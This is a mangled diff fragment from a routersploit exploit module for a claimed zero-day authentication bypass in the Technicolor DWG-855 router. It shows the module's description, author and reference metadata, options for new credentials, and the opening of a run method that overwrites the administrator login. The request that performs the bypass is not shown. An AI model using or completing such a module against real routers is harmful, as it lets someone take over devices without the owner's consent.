'description':'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.\nNOTE2: run \"check\" after runing module to see if it worked.',
'description':'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
'author':[
'JPaulMora <https://JPaulMora.GitHub.io>',
# vulnerability discovery,routersploit module
],
'references':[
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
...
...
@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit):
npass=exploits.Option('rpass','Overwrite old password with.. ')
defrun(self):
print_status("Changing "+self.target+" credentials to "+self.nuser+":"+self.npass)